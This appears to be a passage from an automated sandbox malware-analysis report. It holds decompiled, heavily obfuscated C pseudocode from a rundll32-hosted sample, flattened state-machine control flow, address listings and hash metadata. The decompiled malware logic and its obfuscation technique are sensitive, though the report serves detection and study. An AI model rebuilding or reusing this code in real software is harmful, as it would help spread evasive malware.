				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E002CCDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E002DC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E002C7B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E002C7C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E002D9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E002C46BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E002C219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                                    0x002c9714
                                                                                                                                    0x002c9717
                                                                                                                                    0x002c971c
                                                                                                                                    0x002c9724
                                                                                                                                    0x002c972c
                                                                                                                                    0x002c9734
                                                                                                                                    0x002c973c
                                                                                                                                    0x002c9745
                                                                                                                                    0x002c9749
                                                                                                                                    0x002c974b
                                                                                                                                    0x002c9752
                                                                                                                                    0x002c975a
                                                                                                                                    0x002c975c
                                                                                                                                    0x002c9764
                                                                                                                                    0x002c9769
                                                                                                                                    0x002c9771
                                                                                                                                    0x002c9779
                                                                                                                                    0x002c9781
                                                                                                                                    0x002c9789
                                                                                                                                    0x002c9791
                                                                                                                                    0x002c9799
                                                                                                                                    0x002c97a1
                                                                                                                                    0x002c97a6
                                                                                                                                    0x002c97ae
                                                                                                                                    0x002c97b6
                                                                                                                                    0x002c97be
                                                                                                                                    0x002c97c6
                                                                                                                                    0x002c97ce
                                                                                                                                    0x002c97d6
                                                                                                                                    0x002c97e4
                                                                                                                                    0x002c97e9
                                                                                                                                    0x002c97f4
                                                                                                                                    0x002c97f7
                                                                                                                                    0x002c97fb
                                                                                                                                    0x002c9803
                                                                                                                                    0x002c9813
                                                                                                                                    0x002c981c
                                                                                                                                    0x002c981f
                                                                                                                                    0x002c982b
                                                                                                                                    0x002c982f
                                                                                                                                    0x002c9837
                                                                                                                                    0x002c983f
                                                                                                                                    0x002c9844
                                                                                                                                    0x002c9850
                                                                                                                                    0x002c9853
                                                                                                                                    0x002c9857
                                                                                                                                    0x002c985f
                                                                                                                                    0x002c9867
                                                                                                                                    0x002c986f
                                                                                                                                    0x002c9877
                                                                                                                                    0x002c987f
                                                                                                                                    0x002c9887
                                                                                                                                    0x002c988f
                                                                                                                                    0x002c9897
                                                                                                                                    0x002c989f
                                                                                                                                    0x002c98a7
                                                                                                                                    0x002c98ac
                                                                                                                                    0x002c98b1
                                                                                                                                    0x002c98b9
                                                                                                                                    0x002c98c1
                                                                                                                                    0x002c98c9
                                                                                                                                    0x002c98d3
                                                                                                                                    0x002c98e0
                                                                                                                                    0x002c98e8
                                                                                                                                    0x002c98f0
                                                                                                                                    0x002c98f8
                                                                                                                                    0x002c9907
                                                                                                                                    0x002c990a
                                                                                                                                    0x002c990e
                                                                                                                                    0x002c9916
                                                                                                                                    0x002c9923
                                                                                                                                    0x002c9927
                                                                                                                                    0x002c992f
                                                                                                                                    0x002c9937
                                                                                                                                    0x002c993f
                                                                                                                                    0x002c9947
                                                                                                                                    0x002c994f
                                                                                                                                    0x002c9957
                                                                                                                                    0x002c995f
                                                                                                                                    0x002c9967
                                                                                                                                    0x002c996f
                                                                                                                                    0x002c997f
                                                                                                                                    0x002c9983
                                                                                                                                    0x002c998b
                                                                                                                                    0x002c9993
                                                                                                                                    0x002c999b
                                                                                                                                    0x002c99a7
                                                                                                                                    0x002c99ac
                                                                                                                                    0x002c99b2
                                                                                                                                    0x002c99ba
                                                                                                                                    0x002c99c2
                                                                                                                                    0x002c99ce
                                                                                                                                    0x002c99d1
                                                                                                                                    0x002c99d5
                                                                                                                                    0x002c99dd
                                                                                                                                    0x002c99ea
                                                                                                                                    0x002c99ee
                                                                                                                                    0x002c99f6
                                                                                                                                    0x002c99fe
                                                                                                                                    0x002c9a06
                                                                                                                                    0x002c9a0e
                                                                                                                                    0x002c9a13
                                                                                                                                    0x002c9a18
                                                                                                                                    0x002c9a20
                                                                                                                                    0x002c9a28
                                                                                                                                    0x002c9a30
                                                                                                                                    0x002c9a38
                                                                                                                                    0x002c9a40
                                                                                                                                    0x002c9a48
                                                                                                                                    0x002c9a4d
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a5a
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a5a
                                                                                                                                    0x002c9a6c
                                                                                                                                    0x002c9b32
                                                                                                                                    0x002c9b36
                                                                                                                                    0x002c9b3b
                                                                                                                                    0x002c9b3e
                                                                                                                                    0x002c9b41
                                                                                                                                    0x002c9b45
                                                                                                                                    0x002c9b4a
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b4a
                                                                                                                                    0x002c9a78
                                                                                                                                    0x002c9ac5
                                                                                                                                    0x002c9ad8
                                                                                                                                    0x002c9add
                                                                                                                                    0x002c9ae0
                                                                                                                                    0x002c9ae3
                                                                                                                                    0x002c9ae5
                                                                                                                                    0x002c9afd
                                                                                                                                    0x002c9b02
                                                                                                                                    0x002c9b05
                                                                                                                                    0x002c9b09
                                                                                                                                    0x002c9b11
                                                                                                                                    0x002c9b15
                                                                                                                                    0x002c9b1a
                                                                                                                                    0x002c9b1d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b1d
                                                                                                                                    0x002c9a7a
                                                                                                                                    0x002c9a7c
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b7a
                                                                                                                                    0x002c9a84
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a8a
                                                                                                                                    0x002c9aae
                                                                                                                                    0x002c9ab3
                                                                                                                                    0x002c9ab6
                                                                                                                                    0x002c9abb
                                                                                                                                    0x002c9ac1
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9abb
                                                                                                                                    0x002c9a84
                                                                                                                                    0x002c9b82
                                                                                                                                    0x002c9b82
                                                                                                                                    0x002c9b52
                                                                                                                                    0x002c9b57
                                                                                                                                    0x002c9b57
                                                                                                                                    0x002c9b57
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a5a

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                    • API String ID: 0-1622084174
                                                                                                                                    • Opcode ID: b03732c8954ea1ab182b22c442f9765aa6dc486a893ef2c54dba3f8eae89560b
                                                                                                                                    • Instruction ID: 53c14a2e2fbe62fbd17af8ae39f20f8471c9e618fb51ca14645c4112e019238a
                                                                                                                                    • Opcode Fuzzy Hash: b03732c8954ea1ab182b22c442f9765aa6dc486a893ef2c54dba3f8eae89560b
                                                                                                                                    • Instruction Fuzzy Hash: AEB13072908341AFC358CF25C58A90BFBE1BBC4758F108A1DF59A96220D3B5D969CF82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C64E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C64E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E002D0AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E002C80E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E002D8519(_v360, _v348, _v292);
								E002D8519(_v352, _v388, _t422);
								E002D8519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E002C4B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E002DF435( &_v292,  &_v284);
								} else {
									_t359 = E002DA666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x2e3e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x2e3e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x2e3e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E002D8519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x2e3e08; // 0x0
							_t338 =  *0x2e3e08; // 0x0
							_t343 =  *0x2e3e08; // 0x0
							_t345 = E002DE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E002C5548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E002CCF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                                    0x002c64ec
                                                                                                                                    0x002c64f3
                                                                                                                                    0x002c64f5
                                                                                                                                    0x002c64fc
                                                                                                                                    0x002c6503
                                                                                                                                    0x002c650a
                                                                                                                                    0x002c6511
                                                                                                                                    0x002c6518
                                                                                                                                    0x002c6519
                                                                                                                                    0x002c651a
                                                                                                                                    0x002c651f
                                                                                                                                    0x002c6527
                                                                                                                                    0x002c652a
                                                                                                                                    0x002c6537
                                                                                                                                    0x002c653f
                                                                                                                                    0x002c6541
                                                                                                                                    0x002c6549
                                                                                                                                    0x002c654e
                                                                                                                                    0x002c6556
                                                                                                                                    0x002c655e
                                                                                                                                    0x002c6566
                                                                                                                                    0x002c6574
                                                                                                                                    0x002c6579
                                                                                                                                    0x002c657f
                                                                                                                                    0x002c6587
                                                                                                                                    0x002c6592
                                                                                                                                    0x002c659a
                                                                                                                                    0x002c65a5
                                                                                                                                    0x002c65b2
                                                                                                                                    0x002c65b5
                                                                                                                                    0x002c65b9
                                                                                                                                    0x002c65c1
                                                                                                                                    0x002c65c9
                                                                                                                                    0x002c65d1
                                                                                                                                    0x002c65d9
                                                                                                                                    0x002c65e1
                                                                                                                                    0x002c65e6
                                                                                                                                    0x002c65ee
                                                                                                                                    0x002c65f6
                                                                                                                                    0x002c65fe
                                                                                                                                    0x002c6606
                                                                                                                                    0x002c660e
                                                                                                                                    0x002c6616
                                                                                                                                    0x002c661e
                                                                                                                                    0x002c6626
                                                                                                                                    0x002c6636
                                                                                                                                    0x002c663a
                                                                                                                                    0x002c6642
                                                                                                                                    0x002c664a
                                                                                                                                    0x002c6652
                                                                                                                                    0x002c665a
                                                                                                                                    0x002c6662
                                                                                                                                    0x002c6674
                                                                                                                                    0x002c6677
                                                                                                                                    0x002c667b
                                                                                                                                    0x002c6683
                                                                                                                                    0x002c668b
                                                                                                                                    0x002c6690
                                                                                                                                    0x002c6698
                                                                                                                                    0x002c66a0
                                                                                                                                    0x002c66a8
                                                                                                                                    0x002c66b0
                                                                                                                                    0x002c66b8
                                                                                                                                    0x002c66c0
                                                                                                                                    0x002c66c8
                                                                                                                                    0x002c66d2
                                                                                                                                    0x002c66da
                                                                                                                                    0x002c66e2
                                                                                                                                    0x002c66ea
                                                                                                                                    0x002c66ef
                                                                                                                                    0x002c66f4
                                                                                                                                    0x002c66fc
                                                                                                                                    0x002c6704
                                                                                                                                    0x002c6712
                                                                                                                                    0x002c6717
                                                                                                                                    0x002c671d
                                                                                                                                    0x002c6722
                                                                                                                                    0x002c672a
                                                                                                                                    0x002c6732
                                                                                                                                    0x002c673a
                                                                                                                                    0x002c6742
                                                                                                                                    0x002c674a
                                                                                                                                    0x002c6757
                                                                                                                                    0x002c675a
                                                                                                                                    0x002c675e
                                                                                                                                    0x002c6766
                                                                                                                                    0x002c676e
                                                                                                                                    0x002c6776
                                                                                                                                    0x002c6783
                                                                                                                                    0x002c6787
                                                                                                                                    0x002c678f
                                                                                                                                    0x002c6797
                                                                                                                                    0x002c679f
                                                                                                                                    0x002c67a7
                                                                                                                                    0x002c67af
                                                                                                                                    0x002c67b7
                                                                                                                                    0x002c67bf
                                                                                                                                    0x002c67c7
                                                                                                                                    0x002c67cf
                                                                                                                                    0x002c67d7
                                                                                                                                    0x002c67df
                                                                                                                                    0x002c67e7
                                                                                                                                    0x002c67ef
                                                                                                                                    0x002c67f7
                                                                                                                                    0x002c67ff
                                                                                                                                    0x002c6804
                                                                                                                                    0x002c680c
                                                                                                                                    0x002c6814
                                                                                                                                    0x002c681c
                                                                                                                                    0x002c6824
                                                                                                                                    0x002c6829
                                                                                                                                    0x002c6831
                                                                                                                                    0x002c6839
                                                                                                                                    0x002c6841
                                                                                                                                    0x002c6846
                                                                                                                                    0x002c684e
                                                                                                                                    0x002c6856
                                                                                                                                    0x002c685e
                                                                                                                                    0x002c6863
                                                                                                                                    0x002c686b
                                                                                                                                    0x002c6873
                                                                                                                                    0x002c687d
                                                                                                                                    0x002c6881
                                                                                                                                    0x002c6889
                                                                                                                                    0x002c6899
                                                                                                                                    0x002c68a1
                                                                                                                                    0x002c68a6
                                                                                                                                    0x002c68b0
                                                                                                                                    0x002c68b3
                                                                                                                                    0x002c68b7
                                                                                                                                    0x002c68bb
                                                                                                                                    0x002c68c3
                                                                                                                                    0x002c68c7
                                                                                                                                    0x002c68d2
                                                                                                                                    0x002c68dd
                                                                                                                                    0x002c68e8
                                                                                                                                    0x002c68f5
                                                                                                                                    0x002c68f9
                                                                                                                                    0x002c6901
                                                                                                                                    0x002c6909
                                                                                                                                    0x002c690e
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c691b
                                                                                                                                    0x002c691b
                                                                                                                                    0x002c691b
                                                                                                                                    0x002c691b
                                                                                                                                    0x002c691d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6923
                                                                                                                                    0x002c6a56
                                                                                                                                    0x002c6a5b
                                                                                                                                    0x002c6a6d
                                                                                                                                    0x002c6a72
                                                                                                                                    0x002c6a73
                                                                                                                                    0x002c6a75
                                                                                                                                    0x002c6a7a
                                                                                                                                    0x002c6a7d
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c692f
                                                                                                                                    0x002c6a16
                                                                                                                                    0x002c6a25
                                                                                                                                    0x002c6a3d
                                                                                                                                    0x002c6a43
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x002c693b
                                                                                                                                    0x002c69d8
                                                                                                                                    0x002c69da
                                                                                                                                    0x002c69df
                                                                                                                                    0x002c69e6
                                                                                                                                    0x002c69ed
                                                                                                                                    0x002c69f4
                                                                                                                                    0x002c69fd
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6947
                                                                                                                                    0x002c6999
                                                                                                                                    0x002c69a9
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c69ae
                                                                                                                                    0x002c69b7
                                                                                                                                    0x002c69bc
                                                                                                                                    0x00000000
                                                                                                                                    0x002c69bc
                                                                                                                                    0x002c694f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6955
                                                                                                                                    0x002c695e
                                                                                                                                    0x002c6960
                                                                                                                                    0x002c6963
                                                                                                                                    0x002c6966
                                                                                                                                    0x002c696b
                                                                                                                                    0x002c6970
                                                                                                                                    0x002c6970
                                                                                                                                    0x002c6973
                                                                                                                                    0x002c697a
                                                                                                                                    0x002c6bdb
                                                                                                                                    0x002c6be1
                                                                                                                                    0x002c6be8
                                                                                                                                    0x002c6bf1
                                                                                                                                    0x002c6980
                                                                                                                                    0x002c6980
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c697a
                                                                                                                                    0x002c6a8d
                                                                                                                                    0x002c6bbd
                                                                                                                                    0x002c6bc3
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bc3
                                                                                                                                    0x002c6a99
                                                                                                                                    0x002c6b34
                                                                                                                                    0x002c6b4c
                                                                                                                                    0x002c6b7d
                                                                                                                                    0x002c6b89
                                                                                                                                    0x002c6b8e
                                                                                                                                    0x002c6b93
                                                                                                                                    0x002c6b9f
                                                                                                                                    0x002c6ba4
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6aa5
                                                                                                                                    0x002c6b0f
                                                                                                                                    0x002c6b14
                                                                                                                                    0x002c6b19
                                                                                                                                    0x002c6b25
                                                                                                                                    0x002c6b1b
                                                                                                                                    0x002c6b1d
                                                                                                                                    0x002c6b22
                                                                                                                                    0x002c6b22
                                                                                                                                    0x002c6b2a
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6aad
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6ad6
                                                                                                                                    0x002c6adb
                                                                                                                                    0x002c6ae0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6ae6
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bcd
                                                                                                                                    0x002c6bcd
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bd9

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                    • API String ID: 0-2895984816
                                                                                                                                    • Opcode ID: d6cd6d329ba87e568ec073a7283cc6e18d4dc02f583365c4ca35d155ad674d39
